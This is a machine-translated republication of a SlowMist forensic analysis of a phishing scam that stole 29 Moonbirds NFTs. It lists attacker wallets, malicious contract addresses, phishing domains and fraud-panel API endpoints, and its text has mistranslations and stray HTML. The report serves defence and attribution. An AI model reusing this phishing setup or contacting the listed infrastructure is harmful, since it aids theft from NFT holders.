OPRR Flash Depth Activities

Search Extension

Slow Mist: Analysis of the source of 29 Moonbirds NFT theft incidents

2022-05-28 12:41

Read this article in 30 Minutes

AI summary

View the summary

Original Source: SlowMist Technology

Original Author: Brother Shan & Yao, SlowMist Security Team

Event Background

On May 25th, Twitter user @0xLosingMoney reported that a user with the ID @Dvincent_ was detected via the phishing website p2peers.io 29 Moonbirds series NFTs worth more than $700,000 were stolen, and the phishing website is currently inaccessible. The user said that the domains sarek.fi and p2peers.io had both been used in past hacks.

Twitter original

Collect relevant information

SlowMist security team received relevant intelligence and conducted a source analysis of the theft.

We started collecting and analyzing information about this phishing incident on Twitter At that time, it was found that @Dvincent_ was the hacker's Twitter account, and the account has been cancelled. According to the records on May 10th, Twitter user @just1n_eth (the holder of BAYC series NFT) said that @Dvincent_ had contacted him to trade BAYC NFT, but because the other party insisted on using p2peers.io, the transaction ended without unacommpolished.

Original tweet

Under the comment on this tweet User @jbe61 stated that he had met the same person and gave a screenshot of the conversation:

On the evening of May 25th, @0xLosingMoney continued to announce the hacker’s wallet on Twitter Related Information.

Twitter original

The following is the hacker address given by @0xLosingMoney

· 0xe8250Bb4eFa6D9d032f7d46393CEaE18168A6B0D

0x8e73fe4d5839c60847066b67ea657a67f42a0adf

0x6035B92fd510 2b6113fE90247763e0ac22bfEF63

· 0xBf41EFdD1b815556c2416DcF427f2e896142aa53

· 0x29C80c2690F91A47803445c5922e76597D1DD2B6

Related address analysis ;

Since the entire theft incident mentioned the phishing website "p2peers.io", we started here. The p2peers website registered with a Finnish domain name company has been suspended, and we finally found the information on the homepage of the website in the Google webpage snapshot.

According to the snapshot of the web page, it can be found https://p2peers.io / front-end code, the main JS code is "js/app.eb17746b.js".

Because it is no longer possible to directly view the JS code, use the snapshot history of the Cachedview website to view Main JS source until April 30, 2022.

By sorting out the JS, we found the phishing website information and transaction address involved in the code.

Find the approve address at line 912:

0x7F748D5fb52b9717f83Ed69f49fc4c2f15d83b6A

On line 3407 of the code, we also found the address of the approve related operation:

0xc9E39Ad832cea1677426e5fA8966416337F88749

We started to analyze the transaction records of these two addresses:

0x7F748D5fb52b9717f83Ed69f49fc4c2f15d83b6A

0xc9E39Ad832cea1677426e5fA8966416337F88749

First in Etherscan query found that 0x7F7...b6A is a malicious contract address:

The creator (attacker) of this malicious contract is the address:

0xd975f8c82932f55c7cef51eb4247f2bea9604aa3, found that this address has multiple NFT transaction records:

We further checked on the NFTGO website, and according to the current NFT holdings at this address, we found that the stolen NFTs are currently staying at this address and have not been sold, with a total value of about 225,475 US dollars.

Using NFTSCAN, it is found that there are a total of 21 NFTs, worth 96.5 ETH.

Continue to use MistTrack to analyze attacker address transaction history:

It can be found that the number of ETH transactions at this address is not There are only 12 times at most, and the balance is only 0.0615 ETH.

0xc9E39Ad832cea1677426e5fA8966416337F88749 is also the contract address, the contract creator is 0x6035B92fd5102b6113fE90247763e0ac22bfEF63, this The address is also mentioned in the list of hacker addresses published by @0xLosingMoney .

Using MistTrack found that the balance of this address is also not much, there are 21 deposits and 97 deposits, A total of 106.2 ETH has been transferred out.

Checking the incoming and outgoing information, you can find multiple transfers to Tornado.Cash, indicating that hackers have transferred the stolen coins through various methods.

Hackers use moralis services to do evil

We found that the service interface with the domain name usemoralis.com was used in line 409 of the JS code:

where port 2053 is the API address, And port 2083 is the background login address.

Through the query, it is found that there are a large number of NFT-related websites on the domain name usemoralis.com, many of which are phishing websites.

Google search found Quite a few NFT sites, and found multiple subdomain information.

So we traversed and queried the subdomains of usemoralis.com, and found that there were more than 3,000 related subdomain sites deployed on cloudflare.

Looking further, we found that these sites are all services provided by moralis:

moralis is a service dedicated to developing and building DApps for Web3.

We found that after registration, you can get the interface address and a management background, which makes the cost of making phishing websites very low.

Fraud detected Background and related to phishing events

Continue to analyze the JS code and find that there is a victim on line 368 The address is submitted to the interface whose domain name is pidhnone.se.

According to the statistics, the interfaces with the domain name pidhnone.se are:

· https://pidhnone.se /api/store/log

· https://pidhnone.se/api/self-spoof/

· https:// pidhnone.se/api/address/

https://pidhnone.se/api/crypto/

Further analysis found that https://pidhnone.se/login is actually a fraud control background operated by hackers to manage fraudulent assets and other information.

Splice the address according to the interface of the background address, and you can see the address of the attack and the address of the victim.

There are still image information and The relevant interface operation description text can be seen to be a very obvious fraudulent website operation description.

We analyze the information involved in the background, such as pictures:

https://pidhnone/images/recent.png ? F5395958E0DB1E6E1E3BC66798BF4F8

https://pidhnone.se/images/2.gif? 427f1b04b02f4e7869b1f402fcee11f6

https:/ /pidhnone.se/images/gif.gif?24229b243c99d37cf83c2b4cdb4f6042

https://pidhnone.se/images/landing.png?0732db576131facc35ac81fa15db7a30

https://pidhnone/images/SSS-Create.png?1441444444 4586C2C2C3BB7D233FBE7FC81D7D

p dir="ltr">https://pidhnone.se/images/self-spoof. png? 25e4255ee21ea903c40d1159ba519234

This It involves phishing website information used by hackers in history, such as nftshifter.io:

Take nftshifter.io as an example:

Twitter for records to see 2022 On March 25, a victim visited the phishing website and published it.

Analyze nftshifter.io in the same way:

Obtain JS source code and execute Analysis:

It can be found that the service of Moralis and the fraudulent background of https://pidhnone.se/ are also used for control.

The relevant malicious address:

Fisher contract:

0x8beebade5b1131cf6957f2e8f8294016c276a90f

Contract creator:

0x9d194CBca8d957c3FA4C7bb2B12Ff83Fca6398ee

Contract creation time:

Mar-24-2022 09:05:33 PM +UTC

At the same time we found that this There are 9 malicious contract codes with the same attacker:

Randomly look at a malicious contract 0xc9E.. .749, the address of the creator is

0x6035B92fd5102b6113fE90247763e0ac22bfEF63:

< img src="https://image.blockbeats.cn/upload/2022-05-28/c8fa744a33b19773d2481192667f63b4f3e25787.png?x-oss-process=image/quality,q_50/format,webp">

The same method has been laundered. Each malicious contract already has a record of the victim, so we will not analyze them one by one here.

Let's look at the time of the victim again: ;

Just after the attackers created a malicious phishing, a user fell for it.

The attacker has sold the NFT into ETH, we use MistTrack to analyze the attacker’s address

0x9d194cbca8d957c3fa4c7bb2b12ff83fca6398ee:

You can see that 51 ETH has been transferred to Tornado.Cash for laundering. At the same time, the current Twitter account of the attacker @nftshifter_io has been frozen and cannot be viewed.

Summary

It can be confirmed that attacks have been happening all the time, and there is a mature industrial chain. As of the time of publication, there are still new NFT entries and transactions at the hacker address. Phishing attacks by hackers have often been mass-scaled, and a large number of phishing websites of different NFT projects can be copied in batches by making a phishing template. When the cost of evil becomes very low, it is even more necessary for ordinary users to be more vigilant, strengthen their security awareness, remain suspicious at all times, and avoid becoming the next victim.